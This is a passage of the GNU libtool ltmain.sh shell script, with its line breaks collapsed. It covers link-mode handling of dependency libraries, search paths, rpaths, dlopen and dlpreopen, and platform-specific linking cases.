subdirectory from the argument. func_dirname "$arg" "/" "" xdir=$func_dirname_result func_lo2o "$arg" pic_object=$xdir$objdir/$func_lo2o_result non_pic_object=$xdir$func_lo2o_result func_append libobjs " $pic_object" func_append non_pic_objects " $non_pic_object" else func_fatal_error "'$arg' is not a valid libtool object" fi fi ;; *.$libext) # An archive. func_append deplibs " $arg" func_append old_deplibs " $arg" continue ;; *.la) # A libtool-controlled library. func_resolve_sysroot "$arg" if test dlfiles = "$prev"; then # This library was specified with -dlopen. func_append dlfiles " $func_resolve_sysroot_result" prev= elif test dlprefiles = "$prev"; then # The library was specified with -dlpreopen. func_append dlprefiles " $func_resolve_sysroot_result" prev= else func_append deplibs " $func_resolve_sysroot_result" fi continue ;; # Some other compiler argument. *) # Unknown arguments in both finalize_command and compile_command need # to be aesthetically quoted because they are evaled later. func_quote_arg pretty "$arg" arg=$func_quote_arg_result ;; esac # arg # Now actually substitute the argument into the commands. if test -n "$arg"; then func_append compile_command " $arg" func_append finalize_command " $arg" fi done # argument parsing loop test -n "$prev" && \ func_fatal_help "the '$prevarg' option requires an argument" if test yes = "$export_dynamic" && test -n "$export_dynamic_flag_spec"; then eval arg=\"$export_dynamic_flag_spec\" func_append compile_command " $arg" func_append finalize_command " $arg" fi oldlibs= # calculate the name of the file, without its directory func_basename "$output" outputname=$func_basename_result libobjs_save=$libobjs if test -n "$shlibpath_var"; then # get the directories listed in $shlibpath_var eval shlib_search_path=\`\$ECHO \"\$$shlibpath_var\" \| \$SED \'s/:/ /g\'\` else shlib_search_path= fi eval sys_lib_search_path=\"$sys_lib_search_path_spec\" eval sys_lib_dlsearch_path=\"$sys_lib_dlsearch_path_spec\" # Definition is injected by LT_CONFIG during libtool generation. func_munge_path_list sys_lib_dlsearch_path "$LT_SYS_LIBRARY_PATH" func_dirname "$output" "/" "" output_objdir=$func_dirname_result$objdir func_to_tool_file "$output_objdir/" tool_output_objdir=$func_to_tool_file_result # Create the object directory. func_mkdir_p "$output_objdir" # Determine the type of output case $output in "") func_fatal_help "you must specify an output file" ;; *.$libext) linkmode=oldlib ;; *.lo | *.$objext) linkmode=obj ;; *.la) linkmode=lib ;; *) linkmode=prog ;; # Anything else should be a program. esac specialdeplibs= libs= # Find all interdependent deplibs by searching for libraries # that are linked more than once (e.g. -la -lb -la) for deplib in $deplibs; do if $opt_preserve_dup_deps; then case "$libs " in *" $deplib "*) func_append specialdeplibs " $deplib" ;; esac fi func_append libs " $deplib" done if test lib = "$linkmode"; then libs="$predeps $libs $compiler_lib_search_path $postdeps" # Compute libraries that are listed more than once in $predeps # $postdeps and mark them as special (i.e., whose duplicates are # not to be eliminated). pre_post_deps= if $opt_duplicate_compiler_generated_deps; then for pre_post_dep in $predeps $postdeps; do case "$pre_post_deps " in *" $pre_post_dep "*) func_append specialdeplibs " $pre_post_deps" ;; esac func_append pre_post_deps " $pre_post_dep" done fi pre_post_deps= fi deplibs= newdependency_libs= newlib_search_path= need_relink=no # whether we're linking any uninstalled libtool libraries notinst_deplibs= # not-installed libtool libraries notinst_path= # paths that contain not-installed libtool libraries case $linkmode in lib) passes="conv dlpreopen link" for file in $dlfiles $dlprefiles; do case $file in *.la) ;; *) func_fatal_help "libraries can '-dlopen' only libtool libraries: $file" ;; esac done ;; prog) compile_deplibs= finalize_deplibs= alldeplibs=false newdlfiles= newdlprefiles= passes="conv scan dlopen dlpreopen link" ;; *) passes="conv" ;; esac for pass in $passes; do # The preopen pass in lib mode reverses $deplibs; put it back here # so that -L comes before libs that need it for instance... if test lib,link = "$linkmode,$pass"; then ## FIXME: Find the place where the list is rebuilt in the wrong ## order, and fix it there properly tmp_deplibs= for deplib in $deplibs; do tmp_deplibs="$deplib $tmp_deplibs" done deplibs=$tmp_deplibs fi if test lib,link = "$linkmode,$pass" || test prog,scan = "$linkmode,$pass"; then libs=$deplibs deplibs= fi if test prog = "$linkmode"; then case $pass in dlopen) libs=$dlfiles ;; dlpreopen) libs=$dlprefiles ;; link) libs="$deplibs %DEPLIBS% $dependency_libs" ;; esac fi if test lib,dlpreopen = "$linkmode,$pass"; then # Collect and forward deplibs of preopened libtool libs for lib in $dlprefiles; do # Ignore non-libtool-libs dependency_libs= func_resolve_sysroot "$lib" case $lib in *.la) func_source "$func_resolve_sysroot_result" ;; esac # Collect preopened libtool deplibs, except any this library # has declared as weak libs for deplib in $dependency_libs; do func_basename "$deplib" deplib_base=$func_basename_result case " $weak_libs " in *" $deplib_base "*) ;; *) func_append deplibs " $deplib" ;; esac done done libs=$dlprefiles fi if test dlopen = "$pass"; then # Collect dlpreopened libraries save_deplibs=$deplibs deplibs= fi for deplib in $libs; do lib= found=false case $deplib in -mt|-mthreads|-kthread|-Kthread|-pthread|-pthreads|--thread-safe \ |-threads|-fopenmp|-openmp|-mp|-xopenmp|-omp|-qsmp=*) if test prog,link = "$linkmode,$pass"; then compile_deplibs="$deplib $compile_deplibs" finalize_deplibs="$deplib $finalize_deplibs" else func_append compiler_flags " $deplib" if test lib = "$linkmode"; then case "$new_inherited_linker_flags " in *" $deplib "*) ;; * ) func_append new_inherited_linker_flags " $deplib" ;; esac fi fi continue ;; -l*) if test lib != "$linkmode" && test prog != "$linkmode"; then func_warning "'-l' is ignored for archives/objects" continue fi func_stripname '-l' '' "$deplib" name=$func_stripname_result if test lib = "$linkmode"; then searchdirs="$newlib_search_path $lib_search_path $compiler_lib_search_dirs $sys_lib_search_path $shlib_search_path" else searchdirs="$newlib_search_path $lib_search_path $sys_lib_search_path $shlib_search_path" fi for searchdir in $searchdirs; do for search_ext in .la $std_shrext .so .a; do # Search the libtool library lib=$searchdir/lib$name$search_ext if test -f "$lib"; then if test .la = "$search_ext"; then found=: else found=false fi break 2 fi done done if $found; then # deplib is a libtool library # If $allow_libtool_libs_with_static_runtimes && $deplib is a stdlib, # We need to do some special things here, and not later. if test yes = "$allow_libtool_libs_with_static_runtimes"; then case " $predeps $postdeps " in *" $deplib "*) if func_lalib_p "$lib"; then library_names= old_library= func_source "$lib" for l in $old_library $library_names; do ll=$l done if test "X$ll" = "X$old_library"; then # only static version available found=false func_dirname "$lib" "" "." ladir=$func_dirname_result lib=$ladir/$old_library if test prog,link = "$linkmode,$pass"; then compile_deplibs="$deplib $compile_deplibs" finalize_deplibs="$deplib $finalize_deplibs" else deplibs="$deplib $deplibs" test lib = "$linkmode" && newdependency_libs="$deplib $newdependency_libs" fi continue fi fi ;; *) ;; esac fi else # deplib doesn't seem to be a libtool library if test prog,link = "$linkmode,$pass"; then compile_deplibs="$deplib $compile_deplibs" finalize_deplibs="$deplib $finalize_deplibs" else deplibs="$deplib $deplibs" test lib = "$linkmode" && newdependency_libs="$deplib $newdependency_libs" fi continue fi ;; # -l *.ltframework) if test prog,link = "$linkmode,$pass"; then compile_deplibs="$deplib $compile_deplibs" finalize_deplibs="$deplib $finalize_deplibs" else deplibs="$deplib $deplibs" if test lib = "$linkmode"; then case "$new_inherited_linker_flags " in *" $deplib "*) ;; * ) func_append new_inherited_linker_flags " $deplib" ;; esac fi fi continue ;; -L*) case $linkmode in lib) deplibs="$deplib $deplibs" test conv = "$pass" && continue newdependency_libs="$deplib $newdependency_libs" func_stripname '-L' '' "$deplib" func_resolve_sysroot "$func_stripname_result" func_append newlib_search_path " $func_resolve_sysroot_result" ;; prog) if test conv = "$pass"; then deplibs="$deplib $deplibs" continue fi if test scan = "$pass"; then deplibs="$deplib $deplibs" else compile_deplibs="$deplib $compile_deplibs" finalize_deplibs="$deplib $finalize_deplibs" fi func_stripname '-L' '' "$deplib" func_resolve_sysroot "$func_stripname_result" func_append newlib_search_path " $func_resolve_sysroot_result" ;; *) func_warning "'-L' is ignored for archives/objects" ;; esac # linkmode continue ;; # -L -R*) if test link = "$pass"; then func_stripname '-R' '' "$deplib" func_resolve_sysroot "$func_stripname_result" dir=$func_resolve_sysroot_result # Make sure the xrpath contains only unique directories. case "$xrpath " in *" $dir "*) ;; *) func_append xrpath " $dir" ;; esac fi deplibs="$deplib $deplibs" continue ;; *.la) func_resolve_sysroot "$deplib" lib=$func_resolve_sysroot_result ;; *.$libext) if test conv = "$pass"; then deplibs="$deplib $deplibs" continue fi case $linkmode in lib) # Linking convenience modules into shared libraries is allowed, # but linking other static libraries is non-portable. case " $dlpreconveniencelibs " in *" $deplib "*) ;; *) valid_a_lib=false case $deplibs_check_method in match_pattern*) set dummy $deplibs_check_method; shift match_pattern_regex=`expr "$deplibs_check_method" : "$1 \(.*\)"` if eval "\$ECHO \"$deplib\"" 2>/dev/null | $SED 10q \ | $EGREP "$match_pattern_regex" > /dev/null; then valid_a_lib=: fi ;; pass_all) valid_a_lib=: ;; esac if $valid_a_lib; then echo $ECHO "*** Warning: Linking the shared library $output against the" $ECHO "*** static library $deplib is not portable!" deplibs="$deplib $deplibs" else echo $ECHO "*** Warning: Trying to link with static lib archive $deplib." echo "*** I have the capability to make that library automatically link in when" echo "*** you link to this library. But I can only do this if you have a" echo "*** shared version of the library, which you do not appear to have" echo "*** because the file extensions .$libext of this argument makes me believe" echo "*** that it is just a static archive that I should not use here." fi ;; esac continue ;; prog) if test link != "$pass"; then deplibs="$deplib $deplibs" else compile_deplibs="$deplib $compile_deplibs" finalize_deplibs="$deplib $finalize_deplibs" fi continue ;; esac # linkmode ;; # *.$libext *.lo | *.$objext) if test conv = "$pass"; then deplibs="$deplib $deplibs" elif test prog = "$linkmode"; then if test dlpreopen = "$pass" || test yes != "$dlopen_support" || test no = "$build_libtool_libs"; then # If there is no dlopen support or we're linking statically, # we need to preload. func_append newdlprefiles " $deplib" compile_deplibs="$deplib $compile_deplibs" finalize_deplibs="$deplib $finalize_deplibs" else func_append newdlfiles " $deplib" fi fi continue ;; %DEPLIBS%) alldeplibs=: continue ;; esac # case $deplib $found || test -f "$lib" \ || func_fatal_error "cannot find the library '$lib' or unhandled argument '$deplib'" # Check to see that this really is a libtool archive. func_lalib_unsafe_p "$lib" \ || func_fatal_error "'$lib' is not a valid libtool archive" func_dirname "$lib" "" "." ladir=$func_dirname_result dlname= dlopen= dlpreopen= libdir= library_names= old_library= inherited_linker_flags= # If the library was installed with an old release of libtool, # it will not redefine variables installed, or shouldnotlink installed=yes shouldnotlink=no avoidtemprpath= # Read the .la file func_source "$lib" # Convert "-framework foo" to "foo.ltframework" if test -n "$inherited_linker_flags"; then tmp_inherited_linker_flags=`$ECHO "$inherited_linker_flags" | $SED 's/-framework \([^ $]*\)/\1.ltframework/g'` for tmp_inherited_linker_flag in $tmp_inherited_linker_flags; do case " $new_inherited_linker_flags " in *" $tmp_inherited_linker_flag "*) ;; *) func_append new_inherited_linker_flags " $tmp_inherited_linker_flag";; esac done fi dependency_libs=`$ECHO " $dependency_libs" | $SED 's% \([^ $]*\).ltframework% -framework \1%g'` if test lib,link = "$linkmode,$pass" || test prog,scan = "$linkmode,$pass" || { test prog != "$linkmode" && test lib != "$linkmode"; }; then test -n "$dlopen" && func_append dlfiles " $dlopen" test -n "$dlpreopen" && func_append dlprefiles " $dlpreopen" fi if test conv = "$pass"; then # Only check for convenience libraries deplibs="$lib $deplibs" if test -z "$libdir"; then if test -z "$old_library"; then func_fatal_error "cannot find name of link library for '$lib'" fi # It is a libtool convenience library, so add in its objects. func_append convenience " $ladir/$objdir/$old_library" func_append old_convenience " $ladir/$objdir/$old_library" elif test prog != "$linkmode" && test lib != "$linkmode"; then func_fatal_error "'$lib' is not a convenience library" fi tmp_libs= for deplib in $dependency_libs; do deplibs="$deplib $deplibs" if $opt_preserve_dup_deps; then case "$tmp_libs " in *" $deplib "*) func_append specialdeplibs " $deplib" ;; esac fi func_append tmp_libs " $deplib" done continue fi # $pass = conv # Get the name of the library we link against. linklib= if test -n "$old_library" && { test yes = "$prefer_static_libs" || test built,no = "$prefer_static_libs,$installed"; }; then linklib=$old_library else for l in $old_library $library_names; do linklib=$l done fi if test -z "$linklib"; then func_fatal_error "cannot find name of link library for '$lib'" fi # This library was specified with -dlopen. if test dlopen = "$pass"; then test -z "$libdir" \ && func_fatal_error "cannot -dlopen a convenience library: '$lib'" if test -z "$dlname" || test yes != "$dlopen_support" || test no = "$build_libtool_libs" then # If there is no dlname, no dlopen support or we're linking # statically, we need to preload. We also need to preload any # dependent libraries so libltdl's deplib preloader doesn't # bomb out in the load deplibs phase. func_append dlprefiles " $lib $dependency_libs" else func_append newdlfiles " $lib" fi continue fi # $pass = dlopen # We need an absolute path. case $ladir in [\\/]* | [A-Za-z]:[\\/]*) abs_ladir=$ladir ;; *) abs_ladir=`cd "$ladir" && pwd` if test -z "$abs_ladir"; then func_warning "cannot determine absolute directory name of '$ladir'" func_warning "passing it literally to the linker, although it might fail" abs_ladir=$ladir fi ;; esac func_basename "$lib" laname=$func_basename_result # Find the relevant object directory and library name. if test yes = "$installed"; then if test ! -f "$lt_sysroot$libdir/$linklib" && test -f "$abs_ladir/$linklib"; then func_warning "library '$lib' was moved." dir=$ladir absdir=$abs_ladir libdir=$abs_ladir else dir=$lt_sysroot$libdir absdir=$lt_sysroot$libdir fi test yes = "$hardcode_automatic" && avoidtemprpath=yes else if test ! -f "$ladir/$objdir/$linklib" && test -f "$abs_ladir/$linklib"; then dir=$ladir absdir=$abs_ladir # Remove this search path later func_append notinst_path " $abs_ladir" else dir=$ladir/$objdir absdir=$abs_ladir/$objdir # Remove this search path later func_append notinst_path " $abs_ladir" fi fi # $installed = yes func_stripname 'lib' '.la' "$laname" name=$func_stripname_result # This library was specified with -dlpreopen. if test dlpreopen = "$pass"; then if test -z "$libdir" && test prog = "$linkmode"; then func_fatal_error "only libraries may -dlpreopen a convenience library: '$lib'" fi case $host in # special handling for platforms with PE-DLLs. *cygwin* | *mingw* | *cegcc* ) # Linker will automatically link against shared library if both # static and shared are present. Therefore, ensure we extract # symbols from the import library if a shared library is present # (otherwise, the dlopen module name will be incorrect). We do # this by putting the import library name into $newdlprefiles. # We recover the dlopen module name by 'saving' the la file # name in a special purpose variable, and (later) extracting the # dlname from the la file. if test -n "$dlname"; then func_tr_sh "$dir/$linklib" eval "libfile_$func_tr_sh_result=\$abs_ladir/\$laname" func_append newdlprefiles " $dir/$linklib" else func_append newdlprefiles " $dir/$old_library" # Keep a list of preopened convenience libraries to check # that they are being used correctly in the link pass. test -z "$libdir" && \ func_append dlpreconveniencelibs " $dir/$old_library" fi ;; * ) # Prefer using a static library (so that no silly _DYNAMIC symbols # are required to link). if test -n "$old_library"; then func_append newdlprefiles " $dir/$old_library" # Keep a list of preopened convenience libraries to check # that they are being used correctly in the link pass. test -z "$libdir" && \ func_append dlpreconveniencelibs " $dir/$old_library" # Otherwise, use the dlname, so that lt_dlopen finds it. elif test -n "$dlname"; then func_append newdlprefiles " $dir/$dlname" else func_append newdlprefiles " $dir/$linklib" fi ;; esac fi # $pass = dlpreopen if test -z "$libdir"; then # Link the convenience library if test lib = "$linkmode"; then deplibs="$dir/$old_library $deplibs" elif test prog,link = "$linkmode,$pass"; then compile_deplibs="$dir/$old_library $compile_deplibs" finalize_deplibs="$dir/$old_library $finalize_deplibs" else deplibs="$lib $deplibs" # used for prog,scan pass fi continue fi if test prog = "$linkmode" && test link != "$pass"; then func_append newlib_search_path " $ladir" deplibs="$lib $deplibs" linkalldeplibs=false if test no != "$link_all_deplibs" || test -z "$library_names" || test no = "$build_libtool_libs"; then linkalldeplibs=: fi tmp_libs= for deplib in $dependency_libs; do case $deplib in -L*) func_stripname '-L' '' "$deplib" func_resolve_sysroot "$func_stripname_result" func_append newlib_search_path " $func_resolve_sysroot_result" ;; esac # Need to link against all dependency_libs? if $linkalldeplibs; then deplibs="$deplib $deplibs" else # Need to hardcode shared library paths # or/and link against static libraries newdependency_libs="$deplib $newdependency_libs" fi if $opt_preserve_dup_deps; then case "$tmp_libs " in *" $deplib "*) func_append specialdeplibs " $deplib" ;; esac fi func_append tmp_libs " $deplib" done # for deplib continue fi # $linkmode = prog... if test prog,link = "$linkmode,$pass"; then if test -n "$library_names" && { { test no = "$prefer_static_libs" || test built,yes = "$prefer_static_libs,$installed"; } || test -z "$old_library"; }; then # We need to hardcode the library path if test -n "$shlibpath_var" && test -z "$avoidtemprpath"; then # Make sure the rpath contains only unique directories. case $temp_rpath: in *"$absdir:"*) ;; *) func_append temp_rpath "$absdir:" ;; esac fi # Hardcode the library path. # Skip directories that are in the system default run-time # search path. case " $sys_lib_dlsearch_path " in *" $absdir "*) ;; *) case "$compile_rpath " in *" $absdir "*) ;; *) func_append compile_rpath " $absdir" ;; esac ;; esac case " $sys_lib_dlsearch_path " in *" $libdir "*) ;; *) case "$finalize_rpath " in *" $libdir "*) ;; *) func_append finalize_rpath " $libdir" ;; esac ;; esac fi # $linkmode,$pass = prog,link... if $alldeplibs && { test pass_all = "$deplibs_check_method" || { test yes = "$build_libtool_libs" && test -n "$library_names"; }; }; then # We only need to search for static libraries continue fi fi link_static=no # Whether the deplib will be linked statically use_static_libs=$prefer_static_libs if test built = "$use_static_libs" && test yes = "$installed"; then use_static_libs=no fi if test -n "$library_names" && { test no = "$use_static_libs" || test -z "$old_library"; }; then case $host in *cygwin* | *mingw* | *cegcc* | *os2*) # No point in relinking DLLs because paths are not encoded func_append notinst_deplibs " $lib" need_relink=no ;; *) if test no = "$installed"; then func_append notinst_deplibs " $lib" need_relink=yes fi ;; esac # This is a shared library # Warn about portability, can't link against -module's on some # systems (darwin). Don't bleat about dlopened modules though! dlopenmodule= for dlpremoduletest in $dlprefiles; do if test "X$dlpremoduletest" = "X$lib"; then dlopenmodule=$dlpremoduletest break fi done if test -z "$dlopenmodule" && test yes = "$shouldnotlink" && test link = "$pass"; then echo if test prog = "$linkmode"; then $ECHO "*** Warning: Linking the executable $output against the loadable module" else $ECHO "*** Warning: Linking the shared library $output against the loadable module" fi $ECHO "*** $linklib is not portable!" fi if test lib = "$linkmode" && test yes = "$hardcode_into_libs"; then # Hardcode the library path. # Skip directories that are in the system default run-time # search path. case " $sys_lib_dlsearch_path " in *" $absdir "*) ;; *) case "$compile_rpath " in *" $absdir "*) ;; *) func_append compile_rpath " $absdir" ;; esac ;; esac case " $sys_lib_dlsearch_path " in *" $libdir "*) ;; *) case "$finalize_rpath " in *" $libdir "*) ;; *) func_append finalize_rpath " $libdir" ;; esac ;; esac fi if test -n "$old_archive_from_expsyms_cmds"; then # figure out the soname set dummy $library_names shift realname=$1 shift libname=`eval "\\$ECHO \"$libname_spec\""` # use dlname if we got it. it's perfectly good, no? if test -n "$dlname"; then soname=$dlname elif test -n "$soname_spec"; then # bleh windows case $host in *cygwin* | mingw* | *cegcc* | *os2*) func_arith $current - $age major=$func_arith_result versuffix=-$major ;; esac eval soname=\"$soname_spec\" else soname=$realname fi # Make a new name for the extract_expsyms_cmds to use soroot=$soname func_basename "$soroot" soname=$func_basename_result func_stripname 'lib' '.dll' "$soname" newlib=libimp-$func_stripname_result.a # If the library has no export list, then create one now if test -f "$output_objdir/$soname-def"; then : else func_verbose "extracting exported symbol list from '$soname'" func_execute_cmds "$extract_expsyms_cmds" 'exit $?' fi # Create $newlib if test -f "$output_objdir/$newlib"; then :; else func_verbose "generating import library for '$soname'" func_execute_cmds "$old_archive_from_expsyms_cmds" 'exit $?' fi # make sure the library variables are pointing to the new library dir=$output_objdir linklib=$newlib fi # test -n "$old_archive_from_expsyms_cmds" if test prog = "$linkmode" || test relink != "$opt_mode"; then add_shlibpath= add_dir= add= lib_linked=yes case $hardcode_action in immediate | unsupported) if test no = "$hardcode_direct"; then add=$dir/$linklib case $host in *-*-sco3.2v5.0.[024]*) add_dir=-L$dir ;; *-*-sysv4*uw2*) add_dir=-L$dir ;; *-*-sysv5OpenUNIX* | *-*-sysv5UnixWare7.[01].[10]* | \ *-*-unixware7*) add_dir=-L$dir ;; *-*-darwin* ) # if the lib is a (non-dlopened) module then we cannot # link against it, someone is ignoring the earlier warnings if /usr/bin/file -L $add 2> /dev/null | $GREP ": [^:]* bundle" >/dev/null; then if test "X$dlopenmodule" != "X$lib"; then $ECHO "*** Warning: lib $linklib is a module, not a shared library" if test -z "$old_library"; then echo echo "*** And there doesn't seem to be a static archive available" echo "*** The link will probably fail, sorry" else add=$dir/$old_library fi elif test -n "$old_library"; then add=$dir/$old_library fi fi esac elif test no = "$hardcode_minus_L"; then case $host in *-*-sunos*) add_shlibpath=$dir ;; esac add_dir=-L$dir add=-l$name elif test no = "$hardcode_shlibpath_var"; then add_shlibpath=$dir add=-l$name else lib_linked=no fi ;; relink) if test yes = "$hardcode_direct" && test no = "$hardcode_direct_absolute"; then add=$dir/$linklib elif test yes = "$hardcode_minus_L"; then add_dir=-L$absdir # Try looking first in the location we're being installed to. if test -n "$inst_prefix_dir"; then case $libdir in [\\/]*) func_append add_dir " -L$inst_prefix_dir$libdir" ;; esac fi add=-l$name elif test yes = "$hardcode_shlibpath_var"; then add_shlibpath=$dir add=-l$name else lib_linked=no fi ;; *) lib_linked=no ;; esac if test yes != "$lib_linked"; then func_fatal_configuration "unsupported hardcode properties" fi if test -n "$add_shlibpath"; then case :$compile_shlibpath: in *":$add_shlibpath:"*) ;; *) func_append compile_shlibpath "$add_shlibpath:" ;; esac fi if test prog = "$linkmode"; then test -n "$add_dir" && compile_deplibs="$add_dir $compile_deplibs" test -n "$add" && compile_deplibs="$add $compile_deplibs" else test -n "$add_dir" && deplibs="$add_dir $deplibs" test -n "$add" && deplibs="$add $deplibs" if test yes != "$hardcode_direct" && test yes != "$hardcode_minus_L" && test yes = "$hardcode_shlibpath_var"; then case :$finalize_shlibpath: in *":$libdir:"*) ;; *) func_append finalize_shlibpath "$libdir:" ;; esac fi fi fi if test prog = "$linkmode" || test relink = "$opt_mode"; then add_shlibpath= add_dir= add= # Finalize command for both is simple: just hardcode it. if test yes = "$hardcode_direct" && test no = "$hardcode_direct_absolute"; then add=$libdir/$linklib elif test yes = "$hardcode_minus_L"; then add_dir=-L$libdir add=-l$name elif test yes = "$hardcode_shlibpath_var"; then case :$finalize_shlibpath: in *":$libdir:"*) ;; *) func_append finalize_shlibpath "$libdir:" ;; esac add=-l$name elif test yes = "$hardcode_automatic"; then if test -n "$inst_prefix_dir" && test -f "$inst_prefix_dir$libdir/$linklib"; then add=$inst_prefix_dir$libdir/$linklib else add=$libdir/$linklib fi else # We cannot seem to hardcode it, guess we'll fake it. add_dir=-L$libdir # Try looking first in the location we're being installed to. if test -n "$inst_prefix_dir"; then case $libdir in [\\/]*) func_append add_dir " -L$inst_prefix_dir$libdir" ;; esac fi add=-l$name fi if test prog = "$linkmode"; then test -n "$add_dir" && finalize_deplibs="$add_dir $finalize_deplibs" test -n "$add" && finalize_deplibs="$add $finalize_deplibs" else test -n "$add_dir" && deplibs="$add_dir $deplibs" test -n "$add" && deplibs="$add $deplibs" fi fi elif test prog = "$linkmode"; then # Here we assume that one of hardcode_direct or hardcode_minus_L # is not unsupported. This is valid on all known static and # shared platforms. if test unsupported != "$hardcode_direct"; then test -n "$old_library" && linklib=$old_library compile_deplibs="$dir/$linklib $compile_deplibs" finalize_deplibs="$dir/$linklib $finalize_deplibs" else compile_deplibs="-l$name -L$dir $compile_deplibs" finalize_deplibs="-l$name -L$dir $finalize_deplibs" fi elif test yes = "$build_libtool_libs"; then # Not a shared library if test pass_all != "$deplibs_check_method"; then # We're trying link a shared library against a static one # but the system doesn't support it. # Just print a warning and add the library to dependency_libs so # that the program can be linked against the static library. echo $ECHO "*** Warning: This system cannot link to static lib archive $lib." echo "*** I have the capability to make that library automatically link in when" echo "*** you link to this library. But I can only do this if you have a" echo "*** shared version of the library, which you do not appear to have." if test yes = "$module"; then echo "*** But as you try to build a module library, libtool will still create " echo "*** a static module, that should work as long as the dlopening application" echo "*** is linked with the -dlopen flag to resolve symbols at runtime." if test -z "$global_symbol_pipe"; then echo echo "*** However, this would only work if libtool was able to extract symbol" echo "*** lists from a program, using 'nm' or equivalent, but libtool could" echo "*** not find such a program. So, this module is probably useless." echo "*** 'nm' from GNU binutils and a full rebuild may help." fi if test no = "$build_old_libs"; then build_libtool_libs=module build_old_libs=yes else build_libtool_libs=no fi fi else deplibs="$dir/$old_library $deplibs" link_static=yes fi fi # link shared/static library? if test lib = "$linkmode"; then if test -n "$dependency_libs" && { test yes != "$hardcode_into_libs" || test yes = "$build_old_libs" || test yes = "$link_static"; }; then # Extract -R from dependency_libs temp_deplibs= for libdir in $dependency_libs; do case $libdir in -R*) func_stripname '-R' '' "$libdir" temp_xrpath=$func_stripname_result case " $xrpath " in *" $temp_xrpath "*) ;; *) func_append xrpath " $temp_xrpath";; esac;; *) func_append temp_deplibs " $libdir";; esac done dependency_libs=$temp_deplibs fi func_append newlib_search_path " $absdir" # Link against this library test no = "$link_static" && newdependency_libs="$abs_ladir/$laname $newdependency_libs" # ... and its dependency_libs tmp_libs= for deplib in $dependency_libs; do newdependency_libs="$deplib $newdependency_libs" case $deplib in -L*) func_stripname '-L' '' "$deplib" func_resolve_sysroot "$func_stripname_result";; *) func_resolve_sysroot "$deplib" ;; esac if $opt_preserve_dup_deps; then case "$tmp_libs " in *" $func_resolve_sysroot_result "*) func_append specialdeplibs " $func_resolve_sysroot_result" ;; esac fi func_append tmp_libs " $func_resolve_sysroot_result" done if test no != "$link_all_deplibs"; then # Add the search paths of all dependency libraries for deplib in $dependency_libs; do path= case $deplib in -L*) path=$deplib ;; *.la) func_resolve_sysroot "$deplib" deplib=$func_resolve_sysroot_result func_dirname "$deplib" "" "." dir=$func_dirname_result # We need an absolute path. case $dir in [\\/]* | [A-Za-z]:[\\/]*) absdir=$dir ;; *) absdir=`cd "$dir" && pwd` if test -z "$absdir"; then func_warning "cannot determine absolute directory name of '$dir'" absdir=$dir fi ;; esac if $GREP "^installed=no" $deplib > /dev/null; then case $host in *-*-darwin*) depdepl= eval deplibrary_names=`$SED -n -e 's/^library_names=\(.*\)$/\1/p' $deplib` if test -n "$deplibrary_names"; then for tmp in $deplibrary_names; do depdepl=$tmp done if test -f "$absdir/$objdir/$depdepl"; then depdepl=$absdir/$objdir/$depdepl darwin_install_name=`$OTOOL -L $depdepl | awk '{if (NR == 2) {print $1;exit}}'` if test -z "$darwin_install_name"; then darwin_install_name=`$OTOOL64 -L $depdepl | awk '{if (NR == 2) {print $1;exit}}'` fi func_append compiler_flags " $wl-dylib_file $wl$darwin_install_name:$depdepl" func_append linker_flags " -dylib_file $darwin_install_name:$depdepl" path= fi fi ;; *) path=-L$absdir/$objdir ;; esac else eval libdir=`$SED -n -e 's/^libdir=\(.*\)$/\1/p' $deplib` test -z "$libdir" && \ func_fatal_error "'$deplib' is not a valid libtool archive" test "$absdir" != "$libdir" && \ func_warning "'$deplib' seems to be moved" path=-L$absdir fi ;; esac case " $deplibs " in *" $path "*) ;; *) deplibs="$path $deplibs" ;; esac done fi # link_all_deplibs != no fi # linkmode = lib done # for deplib in $libs if test link = "$pass"; then if test prog = "$linkmode"; then compile_deplibs="$new_inherited_linker_flags $compile_deplibs" finalize_deplibs="$new_inherited_linker_flags $finalize_deplibs" else compiler_flags="$compiler_flags "`$ECHO " $new_inherited_linker_flags" | $SED 's% \([^ $]*\).ltframework% -framework \1%g'` fi fi dependency_libs=$newdependency_libs if test dlpreopen = "$pass"; then # Link the dlpreopened libraries before other libraries for deplib in $save_deplibs; do deplibs="$deplib $deplibs" done fi if test dlopen != "$pass"; then test conv = "$pass" || { # Make sure lib_search_path contains only unique directories. lib_search_path= for dir in $newlib_search_path; do case "$lib_search_path " in *" $dir "*) ;; *) func_append lib_search_path " $dir" ;; esac done newlib_search_path= } if test prog,link = "$linkmode,$pass"; then vars="compile_deplibs finalize_deplibs" else vars=deplibs fi for var in $vars dependency_libs; do # Add libraries to $var in reverse order eval tmp_libs=\"\$$var\" new_libs= for deplib in $tmp_libs; do # FIXME: Pedantically, this is the right thing to do, so # that some nasty dependency loop isn't accidentally # broken: #new_libs="$deplib $new_libs" # Pragmatically, this seems to cause very few problems in # practice: case $deplib in -L*) new_libs="$deplib $new_libs" ;; -R*) ;; *) # And here is the reason: when a library appears more # than once as an explicit dependence of a library, or # is implicitly linked in more than once by the # compiler, it is considered special, and multiple # occurrences thereof are not removed. Compare this # with having the same library being listed as a # dependency of multiple other libraries: in this case, # we know (pedantically, we assume) the library does not # need to be listed more than once, so we keep only the # last copy. This is not always right, but it is rare # enough that we require users that really mean to play # such unportable linking tricks to link the library # using -Wl,-lname, so that libtool does not consider it # for duplicate removal. case " $specialdeplibs " in *" $deplib "*) new_libs="$deplib $new_libs" ;; *) case " $new_libs " in *" $deplib "*) ;; *) new_libs="$deplib $new_libs" ;; esac ;; esac ;; esac done tmp_libs= for deplib in $new_libs; do case $deplib in -L*) case " $tmp_libs " in *" $deplib "*) ;; *) func_append tmp_libs " $deplib" ;; esac ;; *) func_append tmp_libs " $deplib" ;; esac done eval $var=\"$tmp_libs\" done # for var fi # Add Sun CC postdeps if required: test CXX = "$tagname" && { case $host_os in linux*) case `$CC -V 2>&1 | sed 5q` in *Sun\ C*) # Sun C++ 5.9 func_suncc_cstd_abi if test no != "$suncc_use_cstd_abi"; then func_append postdeps ' -library=Cstd -library=Crun' fi ;; esac ;; solaris*) func_cc_basename "$CC" case $func_cc_basename_result in CC* | sunCC*) func_suncc_cstd_abi if test no != "$suncc_use_cstd_abi"; then func_append postdeps ' -library=Cstd -library=Crun' fi ;; esac ;; esac } # Last step: remove runtime libs from dependency_libs # (they stay in deplibs) tmp_libs= for i in $dependency_libs; do case " $predeps $postdeps $compiler_lib_search_path " in *" $i "*) i= ;; esac if test -n "$i"; then func_append tmp_libs " $i" fi done dependency_libs=$tmp_libs done # for pass if test prog = "$linkmode"; then dlfiles=$newdlfiles fi if test prog = "$linkmode" || test lib = "$linkmode"; then dlprefiles=$newdlprefiles fi case $linkmode in 